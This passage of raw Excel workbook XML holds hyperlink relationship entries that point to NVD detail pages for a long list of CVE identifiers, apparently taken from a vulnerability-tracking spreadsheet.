Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67393" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67633" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67641" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67645" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67648" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68776" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68777" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68778" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68779" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68780" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68781" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68784" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69297" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69409" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69497" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69636" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69781" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73029" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76968" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76971" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84391" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69878" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71338" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86590" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78552" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78622" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78620" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69405" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69591" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69637" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69679" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69723" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78629" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68851" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69406" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69504" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69616" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69627" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70290" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71341" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73008" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77488" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83501" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83991" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86673" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69402" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69417" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69690" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84385" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47680" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78631" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84386" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78635" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22575" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68785" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78624" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69615" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78560" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76959" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78508" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76962" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76963" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76977" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78455" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78516" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69904" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76960" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76961" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84389" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84392" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58234" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86517" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId442" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet9.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86996" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12259" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15603" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50646" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62383" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62384" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62385" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62900" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63312" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65915" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70626" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71493" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71494" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72789" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72790" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72925" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73087" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73262" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73558" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73560" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75596" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77037" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77063" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77078" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78675" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78676" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78677" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78678" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78679" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78681" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78682" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78683" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79657" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79674" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79676" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80205" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80206" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81725" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82333" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83611" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 